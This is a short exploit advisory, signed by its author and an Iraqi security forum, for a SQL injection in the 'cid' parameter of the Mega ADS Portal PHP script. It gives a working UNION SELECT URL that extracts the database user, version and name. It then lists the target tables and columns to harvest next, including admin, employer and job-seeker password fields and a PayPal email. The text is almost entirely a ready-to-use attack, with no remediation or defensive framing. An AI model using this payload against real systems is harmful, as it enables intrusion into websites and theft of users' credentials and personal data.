44 lines
No EOL
849 B
Text
44 lines
No EOL
849 B
Text
# Mega ADS Portal (cid) Remote SQL Injection Vulnerability
|
|
|
|
#========================================================
|
|
|
|
# Author: Hussin X
|
|
|
|
# Home : iq-ty.com/vb<http://iq-ty.com/vb>
|
|
|
|
# email: darkangel_g85[at]Yahoo[DoT]com
|
|
|
|
|
|
# Vendor : http://www.preprojects.com/ads.asp
|
|
|
|
|
|
|
|
Exploit:
|
|
|
|
|
|
server/Script/showcategory.php?cid=-21+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6--
|
|
|
|
__________________________
|
|
table_name : column_name
|
|
|
|
configuration:paypal_email
|
|
configuration:vendorid
|
|
configuration:site_name
|
|
configuration:email
|
|
job_admin_login:aid
|
|
job_admin_login:apass
|
|
job_admin_login:name
|
|
job_admin_login:email
|
|
job_aplicants:job_id
|
|
job_education:uname
|
|
job_careerlevel:clname
|
|
job_employer_info:epass
|
|
job_employer_info:CompanyName
|
|
job_seeker_info:uname
|
|
job_seeker_info:upass
|
|
job_tempacc:user_id
|
|
|
|
|
|
end
|
|
|
|
IQ-SecuritY FoRuM |